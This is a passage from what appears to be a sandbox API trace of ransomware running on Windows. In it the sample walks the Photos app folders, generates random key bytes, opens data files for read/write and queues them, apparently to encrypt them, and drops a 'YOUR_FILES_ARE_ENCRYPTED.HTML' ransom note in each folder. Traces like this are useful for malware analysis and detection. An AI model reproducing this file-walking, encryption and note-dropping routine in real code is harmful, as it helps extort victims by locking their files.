lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe" [0119.532] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\*" [0119.532] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b1c2a8e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5b1c2a8e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5b1c2a8e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName=".", cAlternateFileName="")) returned 0x626838 [0119.533] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b1c2a8e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5b1c2a8e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5b1c2a8e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="..", cAlternateFileName="")) returned 1 [0119.533] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b1c2a8e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5b1c2a8e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5b1c2a8e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0119.533] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.533] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\ActivationStore") returned 163 [0119.533] GetProcessHeap () returned 0x600000 [0119.533] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x698498 [0119.534] lstrcpyW (in: lpString1=0x698498, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\ActivationStore" [0119.534] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\ActivationStore\\*" [0119.534] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b1c2a8e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5b1e8cc4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5b1e8cc4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x1a04b3e, cFileName=".", cAlternateFileName="")) returned 0x626778 [0119.534] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b1c2a8e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5b1e8cc4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5b1e8cc4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x1a04b3e, cFileName="..", cAlternateFileName="")) returned 1 [0119.534] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b1c2a8e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x4ec1e5ab, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5b471528, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x6b4210, dwReserved1=0x1a04b3e, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0119.534] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.534] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 183 [0119.534] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0119.534] lstrlenW (lpString=".dat") returned 4 [0119.534] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0119.534] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0119.534] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\microsoft.windows.photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0119.535] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=262144) returned 1 [0119.535] GetProcessHeap () returned 0x600000 [0119.535] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0119.537] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="41") returned 2 [0119.537] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="A0") returned 2 [0119.537] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="FB") returned 2 [0119.537] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="7F") returned 2 [0119.537] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="A6") returned 2 [0119.537] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="3C") returned 2 [0119.537] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="82") returned 2 [0119.537] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="4B") returned 2 [0119.537] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="7D") returned 2 [0119.537] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="37") returned 2 [0119.537] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="A5") returned 2 [0119.537] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="49") returned 2 [0119.537] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="54") returned 2 [0119.537] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="F4") returned 2 [0119.537] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="DF") returned 2 [0119.537] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="C7") returned 2 [0119.537] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="43") returned 2 [0119.537] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="59") returned 2 [0119.537] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="82") returned 2 [0119.537] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="68") returned 2 [0119.537] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="5C") returned 2 [0119.537] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="62") returned 2 [0119.537] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="4C") returned 2 [0119.538] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="2E") returned 2 [0119.538] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="6E") returned 2 [0119.538] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="93") returned 2 [0119.538] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="9A") returned 2 [0119.538] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="69") returned 2 [0119.538] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="38") returned 2 [0119.538] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="B4") returned 2 [0119.538] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="F0") returned 2 [0119.538] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="37") returned 2 [0119.538] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0119.538] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.538] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0119.538] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5b1e8cc4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5b1e8cc4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5b1e8cc4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x1a04b3e, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0119.538] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.538] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 188 [0119.538] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0119.539] lstrlenW (lpString=".LOG1") returned 5 [0119.539] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0119.539] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5b1e8cc4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5b1e8cc4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5b1e8cc4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x1a04b3e, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0119.539] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.539] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 188 [0119.539] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0119.539] lstrlenW (lpString=".LOG2") returned 5 [0119.539] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0119.539] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5b1e8cc4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5b1e8cc4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5b1e8cc4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x1a04b3e, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0119.539] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0119.539] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 193 [0119.539] GetProcessHeap () returned 0x600000 [0119.539] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6a84a0 [0119.539] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\microsoft.windows.photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.540] WriteFile (in: hFile=0x320, lpBuffer=0x6a84a0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6a84a0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.541] CloseHandle (hObject=0x320) returned 1 [0119.541] GetProcessHeap () returned 0x600000 [0119.541] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a84a0 | out: hHeap=0x600000) returned 1 [0119.541] GetProcessHeap () returned 0x600000 [0119.541] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x698498 | out: hHeap=0x600000) returned 1 [0119.541] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b1c2a8e, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5b1c2a8e, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5b1c2a8e, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0119.541] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0119.541] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 177 [0119.541] GetProcessHeap () returned 0x600000 [0119.541] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x698498 [0119.541] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Microsoft.Windows.Photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\microsoft.windows.photos_15.1001.16470.0_x64__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0119.544] WriteFile (in: hFile=0x31c, lpBuffer=0x698498*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x698498*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.545] CloseHandle (hObject=0x31c) returned 1 [0119.545] GetProcessHeap () returned 0x600000 [0119.545] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x698498 | out: hHeap=0x600000) returned 1 [0119.545] GetProcessHeap () returned 0x600000 [0119.545] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.547] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a885816, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a885816, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0119.547] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.547] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState") returned 100 [0119.547] GetProcessHeap () returned 0x600000 [0119.547] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.548] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState" [0119.548] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState\\*" [0119.548] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a885816, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a885816, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0119.548] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a885816, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a885816, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="..", cAlternateFileName="")) returned 1 [0119.548] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a885816, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5a885816, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d268, dwReserved1=0x315d1b8, cFileName="..", cAlternateFileName="")) returned 0 [0119.548] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0119.548] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0119.548] GetProcessHeap () returned 0x600000 [0119.548] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x698498 [0119.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.photos_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0119.550] WriteFile (in: hFile=0x31c, lpBuffer=0x698498*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x698498*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.550] CloseHandle (hObject=0x31c) returned 1 [0119.551] GetProcessHeap () returned 0x600000 [0119.551] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x698498 | out: hHeap=0x600000) returned 1 [0119.551] GetProcessHeap () returned 0x600000 [0119.551] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.551] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a885816, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a885816, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x67b05aac, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0119.551] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.551] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\Settings") returned 96 [0119.551] GetProcessHeap () returned 0x600000 [0119.551] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.551] lstrcpyW (in: lpString1=0x314b010, 